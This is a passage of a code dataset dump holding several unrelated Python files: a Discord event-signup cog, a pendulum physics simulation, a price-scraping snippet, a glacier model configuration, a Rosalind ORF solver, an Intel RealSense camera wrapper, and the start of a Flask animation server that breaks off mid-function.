return\n\n guild = self.bot.get_guild(payload.guild_id)\n user = guild.get_member(payload.user_id)\n if user.bot:\n return\n event = self.event_cache[payload.guild_id][payload.message_id]\n if str(payload.emoji) == \"\\N{WHITE HEAVY CHECK MARK}\":\n await self.add_user_to_event(user, event)\n if str(payload.emoji) == \"\\N{WHITE QUESTION MARK ORNAMENT}\":\n await self.add_user_to_maybe(user, event)\n if str(payload.emoji) == \"\\N{NEGATIVE SQUARED CROSS MARK}\":\n if user == event.hoster:\n async with self.config.guild(guild).events() as events:\n event = await Event.from_json(events[str(user.id)], guild)\n await event.message.edit(content=\"This event has ended.\")\n del events[str(user.id)]\n del self.event_cache[guild.id][event.message.id]\n return\n await self.remove_user_from_event(user, event)\n\n @commands.Cog.listener()\n async def on_raw_reaction_remove(self, payload: discord.RawReactionActionEvent) -> None:\n \"\"\"\n Checks for reactions to the event\n \"\"\"\n if str(payload.emoji) not in EVENT_EMOJIS:\n # log.debug(\"Not a valid yes or no emoji\")\n return\n if payload.guild_id not in self.event_cache:\n return\n if payload.message_id not in self.event_cache[payload.guild_id]:\n return\n\n guild = self.bot.get_guild(payload.guild_id)\n user = guild.get_member(payload.user_id)\n if user.bot:\n return\n event = self.event_cache[payload.guild_id][payload.message_id]\n event_members = [m[0] for m in event.members]\n if str(payload.emoji) == \"\\N{WHITE HEAVY CHECK MARK}\":\n if user == event.hoster:\n return\n if user not in event.maybe:\n await self.remove_user_from_event(user, event)\n if str(payload.emoji) == \"\\N{WHITE QUESTION MARK ORNAMENT}\":\n if user == event.hoster:\n return\n if user not in event_members:\n await self.remove_user_from_event(user, event)\n\n async def add_user_to_event(\n self, user: discord.Member, event: Event, player_class: Optional[str] = \"\"\n ) -> None:\n event_members = [m[0] for m in event.members]\n if user in event_members:\n return\n if event.max_slots and len(event_members) >= event.max_slots:\n return\n if not player_class:\n player_class = await self.config.member(user).player_class()\n event.members.append((user, player_class))\n if user in event.maybe:\n event.maybe.remove(user)\n ctx = await self.bot.get_context(event.message)\n em = await self.make_event_embed(ctx, event)\n await event.message.edit(embed=em)\n async with self.config.guild(ctx.guild).events() as cur_events:\n cur_events[str(event.hoster.id)] = event.to_json()\n self.event_cache[ctx.guild.id][event.message.id] = event\n return\n\n async def add_user_to_maybe(\n self, user: discord.Member, event: Event, player_class: Optional[str] = \"\"\n ) -> None:\n event_members = [m[0] for m in event.members]\n if user in event.maybe:\n return\n event.maybe.append(user)\n if user in event_members:\n if not player_class:\n player_class = await self.config.member(user).player_class()\n event.members.remove((user, player_class))\n ctx = await self.bot.get_context(event.message)\n em = await self.make_event_embed(ctx, event)\n await event.message.edit(embed=em)\n async with self.config.guild(ctx.guild).events() as cur_events:\n cur_events[str(event.hoster.id)] = event.to_json()\n self.event_cache[ctx.guild.id][event.message.id] = event\n return\n\n async def remove_user_from_event(self, user: discord.Member, event: Event) -> None:\n event_members = [m[0] for m in event.members]\n if user in event_members:\n for member, player_class in event.members:\n if member == user:\n event.members.remove((member, player_class))\n ctx = await self.bot.get_context(event.message)\n em = await self.make_event_embed(ctx, event)\n await event.message.edit(embed=em)\n async with self.config.guild(ctx.guild).events() as cur_events:\n cur_events[str(event.hoster.id)] = event.to_json()\n self.event_cache[ctx.guild.id][event.message.id] = event\n if user in event.maybe:\n event.maybe.remove(user)\n ctx = await self.bot.get_context(event.message)\n em = await self.make_event_embed(ctx, event)\n await event.message.edit(embed=em)\n async with self.config.guild(ctx.guild).events() as cur_events:\n cur_events[str(event.hoster.id)] = event.to_json()\n self.event_cache[ctx.guild.id][event.message.id] = event\n\n @commands.command(name=\"event\")\n @commands.guild_only()\n async def make_event(\n self,\n ctx: commands.Context,\n members: commands.Greedy[discord.Member],\n max_slots: Optional[int] = None,\n *,\n description: str,\n ) -> None:\n \"\"\"\n Create an event\n\n `[members...]` Add members already in the event you want to host.\n `[max_slots=None]` Specify maximum number of Slots the event can have, default is no limit.\n `` provide a description for the event you're hosting.\n With custom keyword links setup this will add an image to the events thumbnail\n after being approved by an admin.\n \"\"\"\n approval_channel = ctx.guild.get_channel(\n await self.config.guild(ctx.guild).approval_channel()\n )\n announcement_channel = ctx.guild.get_channel(\n await self.config.guild(ctx.guild).announcement_channel()\n )\n if not approval_channel:\n return await ctx.send(\"No admin channel has been setup on this server.\")\n if not announcement_channel:\n return await ctx.send(\"No announcement channel has been setup on this server.\")\n if str(ctx.author.id) in await self.config.guild(ctx.guild).events():\n if not await self.check_clear_event(ctx):\n return\n if ctx.author not in members:\n members.insert(0, ctx.author)\n member_list = []\n for member in members:\n member_list.append((member, await self.config.member(member).player_class()))\n\n if not max_slots:\n\n max_slots = await self.config.guild(ctx.guild).default_max()\n # log.debug(f\"using default {max_slots}\")\n event = Event(\n hoster=ctx.author, members=list(member_list), event=description, max_slots=max_slots\n )\n em = await self.make_event_embed(ctx, event)\n admin_msg = await approval_channel.send(embed=em)\n start_adding_reactions(admin_msg, ReactionPredicate.YES_OR_NO_EMOJIS)\n pred = ReactionPredicate.yes_or_no(admin_msg)\n reaction, user = await ctx.bot.wait_for(\"reaction_add\", check=pred)\n if pred.result:\n ping = await self.config.guild(ctx.guild).ping()\n event.approver = user\n event.channel = announcement_channel\n em.set_footer(text=f\"Approved by {user}\", icon_url=user.avatar_url)\n posted_message = await announcement_channel.send(ping, embed=em)\n event.message = posted_message\n async with self.config.guild(ctx.guild).events() as cur_events:\n cur_events[str(event.hoster.id)] = event.to_json()\n if ctx.guild.id not in self.event_cache:\n self.event_cache[ctx.guild.id] = {}\n self.event_cache[ctx.guild.id][posted_message.id] = event\n try:\n start_adding_reactions(posted_message, EVENT_EMOJIS)\n except discord.errors.Forbidden:\n pass\n else:\n await ctx.send(f\"{ctx.author.mention}, your event request was denied by an admin.\")\n await admin_msg.delete()\n return\n\n @commands.command(name=\"clearevent\", aliases=[\"endevent\"])\n @commands.guild_only()\n @commands.bot_has_permissions(embed_links=True)\n async def clear_event(self, ctx: commands.Context, clear: bool = False) -> None:\n \"\"\"\n Delete a stored event so you can create more\n\n `[clear]` yes/no to clear your current running event.\n \"\"\"\n if str(ctx.author.id) not in await self.config.guild(ctx.guild).events():\n return await ctx.send(\"You don't have any events running.\")\n elif not clear:\n event_data = await self.config.guild(ctx.guild).events()\n event = await Event.from_json(event_data[str(ctx.author.id)], ctx.guild)\n if not event:\n async with self.config.guild(ctx.guild).events() as events:\n # clear the broken event\n del events[str(ctx.author.id)]\n del self.event_cache[ctx.guild.id][event.message.id]\n return await ctx.send(\"You don't have any events running.\")\n em = await self.make_event_embed(ctx, event)\n return await ctx.send(\n (\n f\"{ctx.author.display_name}, you're currently hosting. \"\n f\"Type `{ctx.prefix}clearevent yes` to clear it.\"\n ),\n embed=em,\n )\n else:\n async with self.config.guild(ctx.guild).events() as events:\n event = await Event.from_json(events[str(ctx.author.id)], ctx.guild)\n await event.message.edit(content=\"This event has ended.\")\n del events[str(ctx.author.id)]\n del self.event_cache[ctx.guild.id][event.message.id]\n await ctx.tick()\n\n @commands.command(name=\"showevent\")\n @commands.guild_only()\n @commands.bot_has_permissions(embed_links=True)\n async def show_event(self, ctx: commands.Context, member: discord.Member = None) -> None:\n \"\"\"Show current event being run by a member\"\"\"\n if not member:\n member = ctx.author\n if str(member.id) not in await self.config.guild(ctx.guild).events():\n return await ctx.send(f\"{member} does not have any events running.\")\n event_data = await self.config.guild(ctx.guild).events()\n event = await Event.from_json(event_data[str(member.id)], ctx.guild)\n if not event:\n async with self.config.guild(ctx.guild).events() as events:\n # clear the broken event\n del events[str(ctx.author.id)]\n del self.event_cache[ctx.guild.id][event.message.id]\n return await ctx.send(\n f\"{member.display_name} is not currently hosting an event.\"\n )\n em = await self.make_event_embed(ctx, event)\n await ctx.send(\n (\n f\"{member.display_name} is currently hosting. \"\n f\"Type `{ctx.prefix}clearevent yes` to clear it.\"\n ),\n embed=em,\n )\n\n @commands.command(name=\"join\")\n @commands.guild_only()\n async def join_event(\n self, ctx: commands.Context, hoster: discord.Member, *, player_class: Optional[str] = None,\n ) -> None:\n \"\"\"Join an event being hosted\"\"\"\n if str(hoster.id) not in await self.config.guild(ctx.guild).events():\n return await ctx.send(\"That user is not currently hosting any events.\")\n event_data = await self.config.guild(ctx.guild).events()\n event = await Event.from_json(event_data[str(hoster.id)], ctx.guild)\n if not event:\n async with self.config.guild(ctx.guild).events() as events:\n # clear the broken event\n del events[str(ctx.author.id)]\n del self.event_cache[ctx.guild.id][event.message.id]\n return await ctx.send(\"That user is not currently hosting any events.\")\n event_members = [m[0] for m in event.members]\n if ctx.author in event_members:\n return await ctx.send(\"You're already participating in this event!\")\n await self.add_user_to_event(ctx.author, event, player_class)\n await ctx.tick()\n\n @commands.command(name=\"leaveevent\")\n @commands.guild_only()\n async def leave_event(self, ctx: commands.Context, hoster: discord.Member) -> None:\n \"\"\"Leave an event being hosted\"\"\"\n if str(hoster.id) not in await self.config.guild(ctx.guild).events():\n return await ctx.send(\"That user is not currently hosting any events.\")\n event_data = await self.config.guild(ctx.guild).events()\n event = await Event.from_json(event_data[str(hoster.id)], ctx.guild)\n if not event:\n async with self.config.guild(ctx.guild).events() as events:\n # clear the broken event\n del events[str(ctx.author.id)]\n del self.event_cache[ctx.guild.id][event.message.id]\n return await ctx.send(\"That user is not currently hosting any events.\")\n event_members = [m[0] for m in event.members]\n if ctx.author not in event_members:\n return await ctx.send(\"You're not participating in this event!\")\n await self.remove_user_from_event(ctx.author, event)\n await ctx.tick()\n\n @commands.command(name=\"removefromevent\")\n @commands.guild_only()\n async def remove_from_event(\n self, ctx: commands.Context, member: discord.Member, hoster: discord.Member = None\n ) -> None:\n \"\"\"\n Remove a user from an event you're hosting\n\n `` The member to remove from your event\n `` mod/admin only to specify whos event to remove a user from.\n \"\"\"\n if hoster and not await self.is_mod_or_admin(ctx.author):\n return await ctx.send(\"You cannot remove a member from someone elses event\")\n if not hoster:\n hoster = ctx.author\n if member is hoster:\n return await ctx.send(\"You cannot remove the hoster from this event.\")\n if str(hoster.id) not in await self.config.guild(ctx.guild).events():\n return await ctx.send(\"You are not currently hosting any events.\")\n event_data = await self.config.guild(ctx.guild).events()\n event = await Event.from_json(event_data[str(ctx.author.id)], ctx.guild)\n if not event:\n async with self.config.guild(ctx.guild).events() as events:\n # clear the broken event\n del events[str(ctx.author.id)]\n del self.event_cache[ctx.guild.id][event.message.id]\n return await ctx.send(\"That user is not currently hosting any events.\")\n event_members = [m[0] for m in event.members]\n if member not in event_members:\n return await ctx.send(\"That member is not participating in that event!\")\n await self.remove_from_event(member, event)\n await ctx.tick()\n\n async def is_mod_or_admin(self, member: discord.Member) -> bool:\n guild = member.guild\n if member == guild.owner:\n return True\n if await self.bot.is_owner(member):\n return True\n if await self.bot.is_admin(member):\n return True\n if await self.bot.is_mod(member):\n return True\n return False\n\n async def make_event_embed(self, ctx: commands.Context, event: Event) -> discord.Embed:\n em = discord.Embed(title=event.event)\n em.set_author(name=f\"{event.hoster} is hosting\", icon_url=event.hoster.avatar_url)\n try:\n prefixes = await self.bot.get_valid_prefixes(ctx.guild)\n prefix = prefixes[0]\n except AttributeError:\n prefixes = await self.bot.get_prefix(ctx.message)\n prefix = prefixes[0]\n max_slots_msg = \"\"\n if event.max_slots:\n slots = event.max_slots - len(event.members)\n if slots < 0:\n slots = 0\n max_slots_msg = f\"**{slots} slots available.**\"\n em.description = (\n f\"To join this event type `{prefix}join {event.hoster}`\" f\"\\n\\n{max_slots_msg}\"\n )\n player_list = \"\"\n for i, member in enumerate(event.members):\n player_class = \"\"\n if member[1]:\n player_class = f\" - {member[1]}\"\n player_list += f\"**Slot {i+1}**\\n{member[0].mention}{player_class}\\n\"\n for page in pagify(player_list, shorten_by=1024):\n em.add_field(name=\"Attendees\", value=page)\n if event.maybe and len(em.fields) < 25:\n em.add_field(name=\"Maybe\", value=humanize_list([m.mention for m in event.maybe]))\n if event.approver:\n em.set_footer(text=f\"Approved by {event.approver}\", icon_url=event.approver.avatar_url)\n thumbnails = await self.config.guild(ctx.guild).custom_links()\n for name, link in thumbnails.items():\n if name.lower() in event.event.lower():\n em.set_thumbnail(url=link)\n return em\n\n async def check_clear_event(self, ctx: commands.Context) -> bool:\n msg = await ctx.send(\"You already have an event running, would you like to cancel it?\")\n start_adding_reactions(msg, ReactionPredicate.YES_OR_NO_EMOJIS)\n pred = ReactionPredicate.yes_or_no(msg, ctx.author)\n await ctx.bot.wait_for(\"reaction_add\", check=pred)\n return pred.result\n\n @commands.group(name=\"eventset\")\n @commands.guild_only()\n async def event_settings(self, ctx: commands.Context) -> None:\n \"\"\"Manage server specific settings for events\"\"\"\n pass\n\n @event_settings.command(name=\"playerclass\")\n @commands.guild_only()\n async def set_default_player_class(\n self, ctx: commands.Context, *, player_class: str = \"\"\n ) -> None:\n \"\"\"\n Set's the users default player class. If nothing is provided this will be rest.\n\n If the user has set this and does not provide a `player_class` in the join command,\n this setting will be used.\n \"\"\"\n await self.config.member(ctx.author).player_class.set(player_class)\n if player_class:\n await ctx.send(\n \"Your player class has been set to {player_class}\".format(\n player_class=player_class\n )\n )\n else:\n await ctx.send(\"Your player class has been reset.\")\n\n @event_settings.command(name=\"defaultmax\", aliases=[\"max\"])\n @checks.mod_or_permissions(manage_messages=True)\n @commands.guild_only()\n async def set_default_max_slots(\n self, ctx: commands.Context, default_max: Optional[int] = None\n ) -> None:\n \"\"\"\n Set's the servers default maximum slots\n\n This can be useful for defining the maximum number of slots allowed for an event.\n \"\"\"\n await self.config.guild(ctx.guild).default_max.set(default_max)\n await ctx.send(\n \"Default maximum slots for events set to {default_max} slots.\".format(\n default_max=default_max\n )\n )\n\n @event_settings.command(name=\"channel\")\n @checks.mod_or_permissions(manage_messages=True)\n @commands.guild_only()\n async def set_channel(\n self, ctx: commands.Context, channel: discord.TextChannel = None\n ) -> None:\n \"\"\"\n Set the Announcement channel for events\n\n Providing no channel will clear the channel.\n \"\"\"\n if channel and not channel.permissions_for(ctx.me).embed_links:\n return await ctx.send(\"I require `Embed Links` permission to use that channel.\")\n save_channel = None\n reply = \"Announcement channel \"\n if channel:\n save_channel = channel.id\n reply += \"set to {chan}\".format(chan=channel.mention)\n await self.config.guild(ctx.guild).announcement_channel.set(save_channel)\n else:\n reply += \"cleared.\"\n await self.config.guild(ctx.guild).announcement_channel.clear()\n await ctx.send(reply)\n\n @event_settings.command(name=\"approvalchannel\")\n @checks.mod_or_permissions(manage_messages=True)\n @commands.guild_only()\n async def set_approval_channel(\n self, ctx: commands.Context, channel: discord.TextChannel = None\n ) -> None:\n \"\"\"\n Set the admin approval channel\n\n Providing no channel will clear the channel.\n \"\"\"\n if channel and not channel.permissions_for(ctx.me).embed_links:\n return await ctx.send(\"I require `Embed Links` permission to use that channel.\")\n if channel and not channel.permissions_for(ctx.me).add_reactions:\n return await ctx.send(\"I require `Add Reactions` permission to use that channel.\")\n save_channel = None\n reply = \"Admin approval channel \"\n if channel:\n save_channel = channel.id\n reply += \"set to {chan}.\".format(chan=channel.mention)\n await self.config.guild(ctx.guild).approval_channel.set(save_channel)\n else:\n await self.config.guild(ctx.guild).approval_channel.clear()\n reply += \"cleared.\"\n\n await ctx.send(reply)\n\n @event_settings.command(name=\"links\")\n @checks.mod_or_permissions(manage_messages=True)\n @commands.guild_only()\n async def set_custom_link(self, ctx: commands.Context, keyword: str, link: ValidImage) -> None:\n \"\"\"\n Set the custom thumbnail for events\n\n `` is the word that will be searched for in event titles.\n `` needs to be an image link to be used for the thumbnail when the keyword\n is found in the event title.\n \"\"\"\n async with self.config.guild(ctx.guild).custom_links() as custom_links:\n if keyword.lower() not in custom_links:\n custom_links[keyword.lower()] = link\n await ctx.tick()\n\n @event_settings.command(name=\"ping\", aliases=[\"mention\"])\n @checks.mod_or_permissions(manage_messages=True)\n @commands.guild_only()\n async def set_ping(self, ctx: commands.Context, *roles: Union[discord.Role, str]) -> None:\n \"\"\"\n Set the ping to use when an event is announced\n\n `[roles...]` is a space separated list of roles to be pinged when an announcement\n is made. Use `here` or `everyone` if you want to ping that specific group of people.\n \"\"\"\n msg = \", \".join(r.mention for r in roles if type(r) == discord.Role)\n msg += \", \".join(f\"@{r}\" for r in roles if r in [\"here\", \"everyone\"])\n await self.config.guild(ctx.guild).ping.set(msg)\n await ctx.tick()\n","sub_path":"eventposter/eventposter.py","file_name":"eventposter.py","file_ext":"py","file_size_in_byte":26189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"391404011","text":"import numpy as np\nimport math as m\nimport matplotlib.pyplot as plt\nfrom methodes import *\n\ng = 9.81\nt0 = 0.\ntf = 10.\neps = 10E-1\nl = 1\n\ndef eq_psimple():\n \"\"\" Modelise l'equation du mouvement du pendule simple\"\"\"\n return lambda X, t: np.array([X[1], (-g/l) * np.sin(X[0])])\n\ndef freq_psimple(theta):\n \"\"\"Calcule la frequence du pendule simple pour un angle theta fourni en parametre\"\"\"\n y0 = np.array([theta, 0.])\n res = meth_epsilon(y0, t0, tf, eps, eq_psimple(), \"rk4\")\n \n i = 0\n deb_variation = abs(res[1][0] - res[0][0]) / (res[1][0] - res[0][0])\n variation = deb_variation\n while( (abs(res[i][1]) > eps or variation == deb_variation) and i < len(res)-1 ):\n i += 1\n variation = abs(res[i+1][0] - res[i][0]) / (res[i+1][0] - res[i][0])\n\n return 1/(t0 + i*eps)\n\ndef tracer_freq(min_theta, max_theta):\n \"\"\"Trace la frequence du pendule simple de longueur l \n en fonction de l'angle theta, entre min_theta et max_theta\"\"\"\n theta = np.arange(min_theta, max_theta, 10E-2)\n\n y = []\n for i in range(len(theta)):\n y = y + [freq_psimple(theta[i])]\n\n u = plt.plot(theta, y, linewidth=1.0)\n plt.xlabel(\"Theta\")\n plt.ylim(0,0.6)\n plt.ylabel(\"Frequence\")\n plt.show()\n\ndef pos_simple(theta):\n \"\"\"On resout l'equation differentielle\"\"\"\n y0 = np.array([theta,0.])\n plt.clf()\n nmax = 300\n y1 = []\n y2 = []\n res = meth_epsilon(y0, t0, tf, 10E-3, eq_psimple(), \"rk4\")\n x = np.arange(t0, tf, (tf - t0)/len(res))\n for i in range(len(res)):\n y1 = y1 + [res[i][0]]\n y2 = y2 + [res[i][1]]\n u = plt.plot(x, y1, linewidth=1.0)\n v = plt.plot(x, y2, linewidth=1.0)\n plt.legend((u,v),(\"Theta\",\"Omega\"))\n plt.show()\n\n\n########### TESTS ###########\n\n#tracer_freq(np.pi/20, np.pi/4)\n#pos_simple(np.pi/10)\n","sub_path":"pendule_simple.py","file_name":"pendule_simple.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"309111074","text":"import requests\nfrom bs4 import BeautifulSoup\n\nURL = \"https://www.johnlewis.com/2020-apple-ipad-pro-12-9-inch-a12z-bionic-ios-wi-fi-256gb/space-grey/p4949087\"\nTAG_NAME = \"p\"\nQUERY = {\"class\": \"price price--large\"}\nresponse = requests.get(URL)\ncontent = response.content\nsoup = BeautifulSoup(content, \"html.parser\")\nelement = soup.find(TAG_NAME, QUERY)\nstring_price = element.text.strip()\nprint(string_price)\n","sub_path":"Section5-2019PriceAlertsOnlineWebStore/76-FindPriceWebsite/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"336294591","text":"import sys\nsrc_directory = '../../../'\nsys.path.append(src_directory)\n\nimport src.model\nimport src.solvers\nimport src.physical_constants\nimport pylab\nimport dolfin\n\ndolfin.set_log_active(True)\n\ntheta = pylab.deg2rad(-3.0)\nL = 100000.\nH = 1000.0\na0 = 100\nsigma = 10000\n\nclass Surface(dolfin.Expression):\n def __init__(self):\n pass\n def eval(self,values,x):\n values[0] = pylab.sin(theta)/pylab.cos(theta)*x[0]\n\nclass Bed(dolfin.Expression):\n def __init__(self):\n pass\n def eval(self,values,x):\n y_0 = -H + a0*(pylab.exp(-((x[0]-L/2.)**2 + (x[1]-L/2.)**2)/sigma**2))\n values[0] = pylab.sin(theta)*(x[0] + pylab.sin(theta)*y_0)/pylab.cos(theta) + pylab.cos(theta)*y_0\n\nclass SMB(dolfin.Expression):\n def eval(self,values,x):\n values[0] = 0.0\n\nnonlin_solver_params = src.helper.default_nonlin_solver_params()\nnonlin_solver_params['newton_solver']['relaxation_parameter'] = 1.0\nnonlin_solver_params['newton_solver']['relative_tolerance'] = 1.0\nnonlin_solver_params['newton_solver']['linear_solver'] = 'gmres'\nnonlin_solver_params['newton_solver']['preconditioner'] = 'hypre_amg'\n\nconfig = { 'mode' : 'transient',\n 'coupled' : \n { 'on' : False,\n 'inner_tol': 0.0,\n 'max_iter' : 1\n },\n 't_start' : 0.0,\n 't_end' : 500.0,\n 'time_step' : 2.0,\n 'velocity' : \n { 'on' : True,\n 'newton_params' : nonlin_solver_params,\n 'viscosity_mode' : 'isothermal',\n 'b_linear' : None,\n 'use_T0': False,\n 'T0' : None,\n 'A0' : 2.140373e-7,\n 'beta2' : (1*2.140373e-7*1000)**-1.,\n 'r' : 0.0,\n 'E' : 1,\n 'approximation' : 'fo',\n 'boundaries' : None\n },\n 'enthalpy' : \n { 'on': False,\n 'use_surface_climate': False,\n 'T_surface' : None,\n \n },\n 'free_surface' :\n { 'on': True,\n 'lump_mass_matrix': False,\n 'use_shock_capturing' : False,\n 'thklim': 10.0,\n 'use_pdd': False,\n 'observed_smb': SMB(),\n 'static_boundary_conditions': False\n }, \n 'age' : \n { 'on': False,\n 'use_smb_for_ela': False,\n 'ela': None,\n },\n 'surface_climate' : \n { 'on': False,\n 'T_ma': None,\n 'T_ju': None,\n 'beta_w': None,\n 'sigma': None,\n 'precip': None\n },\n 'adjoint' :\n { 'alpha' : None,\n 'beta' : None,\n 'max_fun' : None,\n 'objective_function' : 'logarithmic',\n 'animate' : False\n },\n 'output_path' : './results/',\n 'wall_markers' : [],\n 'periodic_boundary_conditions' : True,\n 'log': True }\n\nmodel = src.model.Model()\nmodel.set_geometry(Surface(), Bed())\n\nnx = 50\nny = 50\nnz = 7\n\nmodel.generate_uniform_mesh(nx,ny,nz,xmin=0,xmax=L,ymin=0,ymax=L,generate_pbcs = True)\n\nmodel.set_parameters(src.physical_constants.IceParameters())\n\nmodel.initialize_variables()\nmodel.n = 1.0\nmodel.calculate_boundaries()\n\nT = src.solvers.TransientSolver(model,config)\nT.solve()\n\ndolfin.File('./results_stokes/u.xml') << model.u\ndolfin.File('./results_stokes/v.xml') << model.v\ndolfin.File('./results_stokes/w.xml') << model.w\ndolfin.File('./results_stokes/S.xml') << model.S\n\n","sub_path":"simulations/ISMIP-HOM/F/ISMIP_HOM_F_slip.py","file_name":"ISMIP_HOM_F_slip.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"614250063","text":"'''\r\nCreated on Mar 15, 2013\r\n\r\n@author: Zoya\r\n'''\r\nfrom com.zobar.rosalind.PROT import RNAcodon\r\nfrom com.zobar.rosalind.RNA import convertDNAtoRNAfromFile\r\nfrom com.zobar.rosalind.REVC import REVCfromFile\r\nimport os\r\n\r\nfrom com.zobar.rosalind.rosalind_utils import get_fasta_dna_list\r\n\r\ndef orf(file_name, output_file_name):\r\n dna_list = get_fasta_dna_list(open(file_name))\r\n with open(file_name, 'w') as file_dna:\r\n file_dna.write(dna_list[0].dna)\r\n \r\n temp_rna_file = \"data/temp_rna.txt\"\r\n convertDNAtoRNAfromFile(file_name, temp_rna_file)\r\n temp_rna_revc_file = \"data/temp_rna_revc.txt\"\r\n REVCfromFile(file_name, temp_rna_revc_file)\r\n convertDNAtoRNAfromFile(temp_rna_revc_file, temp_rna_revc_file)\r\n \r\n proteins = set(get_proteins(temp_rna_file) + get_proteins(temp_rna_revc_file))\r\n \r\n with open(output_file_name, 'w') as proteins_file:\r\n proteins_file.write(\"\\n\".join(proteins))\r\n \r\n os.remove(temp_rna_file)\r\n os.remove(temp_rna_revc_file)\r\n \r\ndef get_proteins(file_name):\r\n result = []\r\n with open(file_name) as rna:\r\n codon = rna.read(3)\r\n frames = [[] for tuit in xrange(3)]\r\n k = rna.read(1)\r\n i = 0\r\n while k:\r\n codon = codon[1:] + k\r\n if RNAcodon[codon] == 'Stop':\r\n result.extend(frames[i % 3])\r\n frames[i % 3] = []\r\n else:\r\n for j, protein in enumerate(frames[i % 3]):\r\n frames[i % 3][j] = protein + RNAcodon[codon]\r\n if RNAcodon[codon] == 'M':\r\n frames[i % 3].append(RNAcodon[codon])\r\n k = rna.read(1)\r\n i = i + 1\r\n return result\r\n\r\norf(\"data/rosalind_orf.txt\", \"data/rosalind_orf_result.txt\")\r\n","sub_path":"src/com/zobar/rosalind/ORF.py","file_name":"ORF.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"120985006","text":"import cv2 as cv\nimport numpy as np\n\nfrom r200 import R200Frame\n\nclass IntelCamera:\n \n # Loading of both realsense libraries\n try:\n import pyrealsense as pyrs\n pyrealsense1 = True\n except:\n pyrealsense1 = False\n\n try:\n import pyrealsense2 as rs\n pyrealsense2 = True\n except:\n pyrealsense2 = False\n \n \n def __init__(self, cameraType):\n \n self.r200 = False\n self.d400 = False\n \n # Choose camera with libraries installed\n if not (self.pyrealsense1 or self.pyrealsense2):\n print('No library for pyrealsense found')\n \n if cameraType.lower() == 'r200' and self.pyrealsense1:\n self.r200 = True\n \n if cameraType.lower() == 'd400' and self.pyrealsense2:\n self.d400 = True\n \n if not (self.r200 or self.d400):\n print('Camera {} doesn''t have library installed'.format(cameraType))\n \n def InitialiseStreams(self, depth_width, depth_height, color_width, color_height, fps, custom_options = []):\n \n if self.r200:\n \n try:\n # Configure depth and color streams\n depth_stream = self.pyrs.stream.DepthStream(width=depth_width, height=depth_height, fps=fps)\n color_stream = self.pyrs.stream.ColorStream(width=color_width, height=color_height, fps=fps)\n stream_list = [depth_stream, color_stream]\n\n # Start streaming\n self.serv = self.pyrs.Service()\n self.dev = self.serv.Device(streams=stream_list)\n\n if len(custom_options) != 0:\n try:\n self.dev.set_device_options(*zip(*custom_options))\n\n except pyrs.RealsenseError:\n print('Could not set camera options')\n\n # Get depth scale\n self.scale = self.dev.depth_scale\n \n except: #self.pyrs.utils.RealsenseError as e\n print('Camera not initialized')\n raise\n \n elif self.d400:\n \n try:\n # Configure depth and color streams\n self.pipeline = self.rs.pipeline()\n self.config = self.rs.config()\n self.config.enable_stream(self.rs.stream.depth, depth_width, depth_height, self.rs.format.z16, fps)\n self.config.enable_stream(self.rs.stream.color, color_width, color_height, self.rs.format.bgr8, fps)\n\n # Start streaming\n profile = self.pipeline.start(self.config) # Long to crash, can't input max wait time\n\n # Get depth scale\n depth_sensor = profile.get_device().first_depth_sensor()\n self.scale = depth_sensor.get_depth_scale()\n\n self.align_to = self.rs.stream.color\n self.align = self.rs.align(self.align_to)\n \n except:\n print('Camera not initialized')\n raise\n \n else:\n print('No camera was selected')\n \n def GetScale(self):\n return self.scale\n \n def GetCapture(self):\n \n if self.r200:\n try:\n # Wait for frames\n self.dev.wait_for_frames()\n\n depth_frame = self.dev.depth\n color_frame = self.dev.color\n color_frame = cv.cvtColor(color_frame, cv.COLOR_RGB2BGR)\n \n except:\n raise\n \n elif self.d400:\n try:\n # Wait for a coherent pair of frames: depth and color\n frames = self.pipeline.wait_for_frames(700) # 700 ms before raising an exception\n \n aligned_frames = self.align.process(frames)\n aligned_depth_frame = aligned_frames.get_depth_frame() \n color_frame = aligned_frames.get_color_frame()\n # depth_frame = frames.get_depth_frame()\n # color_frame = frames.get_color_frame()\n\n if not aligned_depth_frame or not color_frame:\n print('Will have to implement continue') #continue #make this operational with a custom exception ?\n\n # Convert images to numpy arrays\n depth_frame = np.asanyarray(aligned_depth_frame.get_data())\n color_frame = np.asanyarray(color_frame.get_data()) \n # depth_image = np.asanyarray(depth_frame.get_data())\n # color_image = np.asanyarray(color_frame.get_data())\n\n # Produce good stream\n # depth_frame = depth_image\n # color_frame = color_image\n \n except:\n raise\n \n # Will this pass the object by reference and cause problems ?\n frame = R200Frame(color_frame, depth_frame, self.scale)\n \n return (frame)\n \n def StopStreaming(self):\n \n if self.r200:\n \n self.dev.stop()\n self.serv.stop()\n \n elif self.d400:\n \n self.pipeline.stop()","sub_path":"intelcamera.py","file_name":"intelcamera.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"440214010","text":"from flask import Flask,request, make_response\nimport numpy as np\nimport cv2\nimport io\nimport logging\nfrom zipfile import ZipFile, ZipInfo\nimport zipfile\nfrom gnomes.cube import Cube\nfrom math import sin,cos,pi, radians\n\n'''\n\nJust a circle moving through all 3 screens of a module in straight line\n\n'''\n\n\n# basic Flask settings\napp = Flask(__name__)\napp.config.update(\n FAKE_LATENCY_BEFORE=1,\n)\napp.debug = True\nlog = logging.getLogger('werkzeug')\nlog.disabled = True\n\n\n# for drawing a circle\nx = 120\ny = 120\ndirection = 'up'\n\n\n# function changes circle's coordinates (goes from screen 0\ndef move_circle():\n global x, y, direction\n if direction == 'up':\n y += 10\n if y >= 360:\n direction = 'left'\n return x, y\n if direction == 'left':\n # remember the last y position so that circle can move straight down\n x += 10\n if x >= 360:\n direction = 'right'\n return x, y\n if direction == 'right':\n x -= 10\n if x <= 120:\n direction = 'down'\n return x, y\n if direction == 'down':\n y -= 10\n if y <= 120:\n direction = 'up'\n return x, y\n\n\n\n@app.route('/test', methods=['GET', 'POST'])\ndef draw():\n # moving the object with 